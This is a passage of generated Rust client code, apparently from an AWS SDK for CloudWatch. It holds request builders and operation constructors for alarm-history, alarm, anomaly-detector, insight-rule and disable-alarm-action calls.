pub fn end_date(mut self, input: smithy_types::Instant) -> Self {
self.end_date = Some(input);
self
}
pub fn set_end_date(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_date = input;
self
}
/// <p>The maximum number of alarm history records to retrieve.</p>
pub fn max_records(mut self, input: i32) -> Self {
self.max_records = Some(input);
self
}
pub fn set_max_records(mut self, input: std::option::Option<i32>) -> Self {
self.max_records = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>Specified whether to return the newest or oldest alarm history first. Specify <code>TimestampDescending</code> to have the newest
/// event history returned first, and specify <code>TimestampAscending</code> to have the oldest history returned first.</p>
pub fn scan_by(mut self, input: crate::model::ScanBy) -> Self {
self.scan_by = Some(input);
self
}
pub fn set_scan_by(mut self, input: std::option::Option<crate::model::ScanBy>) -> Self {
self.scan_by = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmHistoryInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmHistoryInput {
alarm_name: self.alarm_name,
alarm_types: self.alarm_types,
history_item_type: self.history_item_type,
start_date: self.start_date,
end_date: self.end_date,
max_records: self.max_records,
next_token: self.next_token,
scan_by: self.scan_by,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmHistoryInputOperationOutputAlias = crate::operation::DescribeAlarmHistory;
#[doc(hidden)]
pub type DescribeAlarmHistoryInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmHistoryInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarmHistory`](crate::operation::DescribeAlarmHistory)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarmHistory,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarm_history(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarmHistory::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarmHistory",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub fn builder() -> crate::input::describe_alarm_history_input::Builder {
crate::input::describe_alarm_history_input::Builder::default()
}
}
/// See [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
pub mod describe_alarms_input {
/// A builder for [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_name_prefix: std::option::Option<std::string::String>,
pub(crate) alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
pub(crate) children_of_alarm_name: std::option::Option<std::string::String>,
pub(crate) parents_of_alarm_name: std::option::Option<std::string::String>,
pub(crate) state_value: std::option::Option<crate::model::StateValue>,
pub(crate) action_prefix: std::option::Option<std::string::String>,
pub(crate) max_records: std::option::Option<i32>,
pub(crate) next_token: std::option::Option<std::string::String>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// <p>An alarm name prefix. If you specify this parameter, you receive information about all alarms that have names
/// that start with this prefix.</p>
/// <p>If this parameter
/// is specified, you cannot specify <code>AlarmNames</code>.</p>
pub fn alarm_name_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name_prefix = Some(input.into());
self
}
pub fn set_alarm_name_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_name_prefix = input;
self
}
pub fn alarm_types(mut self, input: impl Into<crate::model::AlarmType>) -> Self {
let mut v = self.alarm_types.unwrap_or_default();
v.push(input.into());
self.alarm_types = Some(v);
self
}
pub fn set_alarm_types(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
) -> Self {
self.alarm_types = input;
self
}
/// <p>If you use this parameter and specify the name of a composite alarm, the operation returns
/// information about the "children" alarms
/// of the alarm you specify. These are the metric alarms and composite alarms referenced in the
/// <code>AlarmRule</code> field of the composite alarm that you specify in
/// <code>ChildrenOfAlarmName</code>. Information about the composite alarm that you name in
/// <code>ChildrenOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ChildrenOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you
/// receive a validation
/// error.</p>
/// <note>
/// <p>Only the <code>Alarm Name</code>, <code>ARN</code>, <code>StateValue</code> (OK/ALARM/INSUFFICIENT_DATA), and <code>StateUpdatedTimestamp</code>
/// information are returned by this operation
/// when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub fn children_of_alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.children_of_alarm_name = Some(input.into());
self
}
pub fn set_children_of_alarm_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.children_of_alarm_name = input;
self
}
/// <p>If you use this parameter and specify the name of a metric or composite alarm, the operation returns
/// information about the "parent" alarms
/// of the alarm you specify. These are the composite alarms that have <code>AlarmRule</code>
/// parameters that reference
/// the alarm named in <code>ParentsOfAlarmName</code>. Information about the alarm that you specify in
/// <code>ParentsOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ParentsOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you receive a validation
/// error.</p>
/// <note>
/// <p>Only the Alarm Name and ARN are returned by this operation when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub fn parents_of_alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.parents_of_alarm_name = Some(input.into());
self
}
pub fn set_parents_of_alarm_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.parents_of_alarm_name = input;
self
}
/// <p>Specify this parameter to receive information only about alarms that are currently in the state that you specify.</p>
pub fn state_value(mut self, input: crate::model::StateValue) -> Self {
self.state_value = Some(input);
self
}
pub fn set_state_value(
mut self,
input: std::option::Option<crate::model::StateValue>,
) -> Self {
self.state_value = input;
self
}
/// <p>Use this parameter to filter the results of the operation to only those alarms that
/// use a certain alarm action. For example, you could specify the ARN of an SNS topic to find all
/// alarms that send notifications to that topic.</p>
pub fn action_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.action_prefix = Some(input.into());
self
}
pub fn set_action_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.action_prefix = input;
self
}
/// <p>The maximum number of alarm descriptions to retrieve.</p>
pub fn max_records(mut self, input: i32) -> Self {
self.max_records = Some(input);
self
}
pub fn set_max_records(mut self, input: std::option::Option<i32>) -> Self {
self.max_records = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmsInput {
alarm_names: self.alarm_names,
alarm_name_prefix: self.alarm_name_prefix,
alarm_types: self.alarm_types,
children_of_alarm_name: self.children_of_alarm_name,
parents_of_alarm_name: self.parents_of_alarm_name,
state_value: self.state_value,
action_prefix: self.action_prefix,
max_records: self.max_records,
next_token: self.next_token,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmsInputOperationOutputAlias = crate::operation::DescribeAlarms;
#[doc(hidden)]
pub type DescribeAlarmsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmsInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarms`](crate::operation::DescribeAlarms)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarms,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarms(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarms::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarms",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
pub fn builder() -> crate::input::describe_alarms_input::Builder {
crate::input::describe_alarms_input::Builder::default()
}
}
/// See [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
pub mod describe_alarms_for_metric_input {
/// A builder for [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) statistic: std::option::Option<crate::model::Statistic>,
pub(crate) extended_statistic: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) period: std::option::Option<i32>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
}
impl Builder {
/// <p>The name of the metric.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
/// <p>The namespace of the metric.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The statistic for the metric, other than percentiles.
/// For percentile statistics, use <code>ExtendedStatistics</code>.</p>
pub fn statistic(mut self, input: crate::model::Statistic) -> Self {
self.statistic = Some(input);
self
}
pub fn set_statistic(
mut self,
input: std::option::Option<crate::model::Statistic>,
) -> Self {
self.statistic = input;
self
}
/// <p>The percentile statistic for the metric. Specify a value between
/// p0.0 and p100.</p>
pub fn extended_statistic(mut self, input: impl Into<std::string::String>) -> Self {
self.extended_statistic = Some(input.into());
self
}
pub fn set_extended_statistic(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.extended_statistic = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The period, in seconds, over which the statistic is applied.</p>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The unit for the metric.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmsForMetricInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmsForMetricInput {
metric_name: self.metric_name,
namespace: self.namespace,
statistic: self.statistic,
extended_statistic: self.extended_statistic,
dimensions: self.dimensions,
period: self.period,
unit: self.unit,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmsForMetricInputOperationOutputAlias =
crate::operation::DescribeAlarmsForMetric;
#[doc(hidden)]
pub type DescribeAlarmsForMetricInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmsForMetricInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarmsForMetric`](crate::operation::DescribeAlarmsForMetric)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarmsForMetric,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarms_for_metric(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarmsForMetric::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarmsForMetric",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
pub fn builder() -> crate::input::describe_alarms_for_metric_input::Builder {
crate::input::describe_alarms_for_metric_input::Builder::default()
}
}
/// See [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
pub mod describe_anomaly_detectors_input {
/// A builder for [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
}
impl Builder {
/// <p>Use the token returned by the previous operation to request the next page of results.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation. The maximum
/// value that you can specify is 100.</p>
/// <p>To retrieve the remaining results, make another call with the returned
/// <code>NextToken</code> value. </p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// <p>Limits the results to only the anomaly detection models that
/// are associated with the specified namespace.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric name. If there are multiple metrics with this name in different
/// namespaces that have anomaly detection models, they're all returned.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// Consumes the builder and constructs a [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAnomalyDetectorsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAnomalyDetectorsInput {
next_token: self.next_token,
max_results: self.max_results,
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
})
}
}
}
#[doc(hidden)]
pub type DescribeAnomalyDetectorsInputOperationOutputAlias =
crate::operation::DescribeAnomalyDetectors;
#[doc(hidden)]
pub type DescribeAnomalyDetectorsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAnomalyDetectorsInput {
/// Consumes the builder and constructs an Operation<[`DescribeAnomalyDetectors`](crate::operation::DescribeAnomalyDetectors)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAnomalyDetectors,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_anomaly_detectors(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAnomalyDetectors::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAnomalyDetectors",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
pub fn builder() -> crate::input::describe_anomaly_detectors_input::Builder {
crate::input::describe_anomaly_detectors_input::Builder::default()
}
}
/// See [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
pub mod describe_insight_rules_input {
/// A builder for [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
}
impl Builder {
/// <p>Include this value, if it was returned by the previous operation, to get the next set of rules.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation. If you omit this
/// parameter, the default of 500 is used.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// Consumes the builder and constructs a [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeInsightRulesInput {
next_token: self.next_token,
max_results: self.max_results,
})
}
}
}
#[doc(hidden)]
pub type DescribeInsightRulesInputOperationOutputAlias = crate::operation::DescribeInsightRules;
#[doc(hidden)]
pub type DescribeInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DescribeInsightRules`](crate::operation::DescribeInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
pub fn builder() -> crate::input::describe_insight_rules_input::Builder {
crate::input::describe_insight_rules_input::Builder::default()
}
}
/// See [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
pub mod disable_alarm_actions_input {
/// A builder for [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self | }
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs a [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DisableAlarmActionsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DisableAlarmActionsInput {
alarm_names: self.alarm_names,
})
}
}
}
